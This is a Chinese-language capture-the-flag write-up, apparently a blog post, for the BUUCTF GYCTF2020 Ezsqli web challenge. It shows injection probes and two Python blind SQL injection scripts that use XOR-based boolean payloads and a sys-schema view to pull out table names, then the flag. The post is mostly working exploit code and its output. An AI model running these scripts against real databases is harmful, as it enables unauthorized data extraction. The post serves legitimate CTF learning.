54,【4】BUUCTF WEB GYCTF2020Ezsqli
https://i-blog.csdnimg.cn/direct/6cc7a172a765475ca8cb8883abb84378.jpeg进入靶场
https://i-blog.csdnimg.cn/direct/1382dd939d194d56b2a2955a6f06039b.png
吓我一跳,但凡放个彭于晏我都不说啥了
https://i-blog.csdnimg.cn/direct/1c97e215a0fe4ed39eaef4058f4b5b3f.png
提交个1看看
https://i-blog.csdnimg.cn/direct/585dfd7e55e84cfea9865a5d43e47459.png
1 and 1=1
https://i-blog.csdnimg.cn/direct/2c50f61f0c8d4e6582749b05ad5698e5.png
1'#
https://i-blog.csdnimg.cn/direct/c0976f5d35d24ed5b52ed0c15c298105.png
还实验了很多,不过都被过滤了,头疼
看看别人的WP
竟然要写代码去跑!!!,不会啊,先用别人的代码吧,后续一定去学
第一个代码爆出表名
from turtle import right
import requests
import time
url = "http://..........."
table_name = ""
i = 0
while True:
i = i + 1
letf = 32
right = 127
while letf < right:
mid = (letf + right) // 2
payload = f"0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),{i},1))>{mid})"
data = {"id": payload}
res = requests.post(url=url, data=data).text
if "Nu1L" in res:
letf = mid + 1
else:
right = mid
if letf != 32:
table_name += chr(letf)
time.sleep(0.2)
print(table_name)
else:
break 得到表名 giers233333333333333,f1ag_1s_h3r3_hhhhh
第二个代码通过表名爆出flag
import requests
import time
url = "http://........."
flag = ""
i = 0
while True:
i = i + 1
letf = 32
right = 127
while letf < right:
s = flag
mid = (letf+right) // 2
s = s + chr(mid)
payload = f"0^((select * from f1ag_1s_h3r3_hhhhh)>(select 1,'{s}'))"
data = {"id":payload}
res = requests.post(url=url,data=data).text
if "Nu1L" in res:
letf = mid + 1
else:
right = mid
if letf != 32:
flag += chr(letf-1)
print(flag)
time.sleep(0.2)
else:
break 得到FLAG{E6AC8B59-EC60-4BC1-A3C9-C6B770B889CE}
即flag{e6ac8b59-ec60-4bc1-a3c9-c6b770b889ce}
https://i-blog.csdnimg.cn/direct/cf7ee326eca947769b0360503ad66475.jpeg
条记
学习python脚本怎么写
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]